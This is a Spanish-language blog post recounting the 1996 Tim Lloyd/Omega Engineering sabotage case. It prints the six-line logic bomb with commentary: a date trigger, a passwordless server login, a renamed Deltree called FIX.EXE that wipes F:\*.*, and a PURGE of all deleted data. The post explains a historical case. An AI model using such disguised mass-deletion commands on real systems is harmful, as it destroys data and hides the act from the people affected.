Mitos: el caso Tim Lloyd/Omega

Esta semana, La Sexta emitió un capítulo de la serie "Crimenes Imperfectos" que trataba de uno de los grandes mitos del hacking: el caso de la empresa Omega Engineering.

Para quien no lo conozca, decir que se trata, nada más y nada menos, de la primera sentencia de la Corte Federal de EEUU sobre un delito informático de sabotaje.

Nos remontamos al año 1996, Tim Lloyd programador jefe de Omega (empresa
proveedora de la NASA y de la armada estadounidense) es despedido tras 11 años en la compañía.

Sin embargo, anteriormente Tim ya había previsto tal desenlace y, 10 días después de su despido, explota una bomba lógica que destruye los programas y la información de los empleados en el departamento de producción, provocando más de 10 millones de dólares en pérdidas.

Como si de una película se tratara, el agente especial Hoffman, de los Servicios Secretos americanos, comienza una investigación forense que duraría 4 años y que acabaría con los huesos de Tim en la cárcel, gracias sobretodo a la colaboración de la empresa Ontrack Data International Inc.

Pero una de las cosas más increibles de este caso es el análisis técnico de la bomba lógica de Tim, que desvelaba un programa de ¡tan solo 6 líneas de código!:

1. 7/30/96
n Si, la fecha del boom!

2. F:
n La unidad de acceso al servidor

3. F:\LOGIN\LOGIN 12345
n Automáticamente devuelve el usuario 12345, sin contraseña y con privilegios de acceso al servidor de ficheros

4. CD \PUBLIC
n Acceso a un directorio público, un área común de almacenamiento en el servidor de ficheros

5. FIX.EXE /Y F:\*.*
n FIX.EXE es un ejecutable para DOS que realmente es un comando de borrado, pero que muestra en pantalla la palabra 'corregir' en lugar de 'borrar'. Se trata de una versión de Deltree.exe modificada.

n /Y fuerza el borrado de los ficheros (no pregunta)
n F:\*.* borra todos los ficheros y carpetas del volúmen del servidor

6. PURGE F:\ /ALL
n Fuerza el purgado de toda la información eliminada

Para conocer más en profundidad este mítico caso, imprescindible visitar este enlace.

0 comentarios :

Publicar un comentario en la entrada